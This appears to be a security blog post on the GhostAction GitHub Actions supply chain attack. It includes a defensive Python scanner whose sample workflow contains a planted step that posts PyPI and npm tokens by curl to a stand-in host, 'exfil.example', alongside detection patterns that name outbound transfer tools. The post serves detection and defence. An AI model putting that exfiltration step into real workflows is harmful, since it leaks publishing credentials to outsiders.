GhostAction: Massive GitHub Supply Chain Attack Steals 3,325 Secrets
A new large-scale supply chain attack, dubbed GhostAction, has been discovered by GitGuardian researchers.
📢 Key Findings
- Attackers hijacked maintainer accounts to push malicious GitHub Actions workflows.
- These workflows stole secrets via curl POST requests, exfiltrating them to attacker-controlled domains.
- At least 817 repositories were impacted; the stolen secrets included PyPI, npm, DockerHub, GitHub, Cloudflare and AWS tokens as well as database credentials.
- Roughly 3,325 secrets were stolen.
- Affected ecosystems include Python, Rust, JavaScript, and Go.
- At least 9 npm and 15 PyPI packages remain at risk until secrets are revoked.
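The pattern described above (a workflow step that reads `${{ secrets.* }}` and pushes the values out with a curl POST to a host the release pipeline has no business talking to) is easy to triage for in a repository's own `.github/workflows/`. The scanner below is an added example written for this post, not GitGuardian's tooling or any code from the affected projects. The allow-list of trusted hosts, the step-splitting heuristic and the sample workflow (including the `exfil.example` hostname) are all constructed assumptions; adjust the allow-list to your own registries.

```python
"""Heuristic scanner for GitHub Actions steps that exfiltrate secrets.

A step is reported when it (1) references a repository/organisation secret,
(2) invokes an outbound transfer tool, (3) targets a host that is not on the
trusted allow-list, and (4) attaches data to that request (body, header or
URL interpolation).  Added example; the allow-list and sample are assumptions.
"""
import re
from typing import Dict, List

# Hosts a release workflow legitimately contacts while holding publish tokens.
# Constructed allow-list: extend it for your own registries and mirrors.
TRUSTED_HOSTS = {
    "github.com", "api.github.com", "uploads.github.com",
    "pypi.org", "upload.pypi.org",
    "registry.npmjs.org",
    "index.docker.io", "ghcr.io",
}

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z_][A-Za-z0-9_]*)\s*\}\}")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
# Outbound transfer tools commonly available on hosted runners.
SENDER = re.compile(r"\b(curl|wget|Invoke-WebRequest|Invoke-RestMethod)\b")
# curl/wget flags that attach a body or header, i.e. data leaves the runner.
PAYLOAD_FLAG = re.compile(
    r"(?:^|\s)(?:-d|--data(?:-binary|-raw|-urlencode)?|-F|--form|-T|--upload-file"
    r"|-H|--header|--post-data|--post-file)\b"
)
# A URL with shell/expression interpolation ("https://x/?t=$TOKEN") also carries data.
URL_INTERPOLATION = re.compile(r"https?://\S*\$")
STEP_START = re.compile(r"^\s*-\s+(?:name|uses|run|id):")


def split_steps(workflow_text: str) -> List[str]:
    """Cut a workflow into per-step text blocks without a YAML dependency.

    A step starts at a list item whose first key is name/uses/run/id and runs
    until the next such item, so a step's own env: block stays attached to it.
    Job-level env: blocks are not attributed to steps; use a YAML parser for
    exotic layouts.
    """
    steps, current = [], []
    for line in workflow_text.splitlines():
        if STEP_START.match(line):
            if current:
                steps.append("\n".join(current))
            current = [line]
        elif current:
            current.append(line)
    if current:
        steps.append("\n".join(current))
    return steps


def is_trusted(host: str) -> bool:
    host = host.lower().rstrip(".")
    return any(host == t or host.endswith("." + t) for t in TRUSTED_HOSTS)


def step_name(step: str) -> str:
    m = re.search(r"^\s*-?\s*name:\s*(.+)$", step, re.MULTILINE)
    return m.group(1).strip().strip("'\"") if m else "<unnamed>"


def scan_workflow(workflow_text: str) -> List[Dict]:
    """Return one finding per step that reads a secret and ships it off-platform."""
    findings = []
    for step in split_steps(workflow_text):
        secrets = sorted(set(SECRET_REF.findall(step)))
        if not secrets or not SENDER.search(step):
            continue
        untrusted = sorted({h for h in URL_HOST.findall(step) if not is_trusted(h)})
        if not untrusted:
            continue
        if not (PAYLOAD_FLAG.search(step) or URL_INTERPOLATION.search(step)):
            continue
        findings.append({"step": step_name(step), "secrets": secrets, "hosts": untrusted})
    return findings


# Constructed sample: a normal publish step, a planted exfiltration step that
# mirrors the reported curl POST technique, and a benign call to the GitHub API.
SAMPLE_WORKFLOW = """\
name: Release
on: [push]
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Publish to PyPI
        env:
          TWINE_PASSWORD: ${{ secrets.PYPI_TOKEN }}
        run: |
          python -m pip install twine
          twine upload dist/* --repository-url https://upload.pypi.org/legacy/
      - name: Security check
        env:
          PYPI_TOKEN: ${{ secrets.PYPI_TOKEN }}
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
        run: |
          curl -s -X POST -d "pypi=$PYPI_TOKEN&npm=$NPM_TOKEN" https://exfil.example/collect
      - name: Notify
        run: curl -X POST -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" -d '{"state":"ok"}' https://api.github.com/repos/org/repo/statuses/abc
"""

if __name__ == "__main__":
    for f in scan_workflow(SAMPLE_WORKFLOW):
        print(f"SUSPICIOUS step '{f['step']}': secrets {f['secrets']} sent to {f['hosts']}")
```

Run it over every file under `.github/workflows/` and over the diff of any workflow change pushed by a maintainer account; the twine and GitHub API steps pass because their destinations are on the allow-list, while the planted step is flagged because it maps two publish tokens into the environment and posts them to an unknown host. A hit means rotate the named secrets first and investigate the commit second.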
⚠️ Impact
Some repositories quickly reverted the malicious commits, but reverting a commit does not invalidate secrets that have already been exfiltrated; the scope of the campaign reveals a significant supply chain risk.
Attackers holding the stolen credentials can publish trojanized or malicious packages to the affected registries until those credentials are revoked.
🔐 Response
- GitGuardian raised issues in 573 repositories and alerted GitHub, npm, and PyPI.
- The exfiltration endpoint has since gone offline, but stolen credentials may still be abused.
At Alcaeus Services, we help organizations secure their software supply chains, monitor for leaked secrets, and prevent compromise before it reaches production.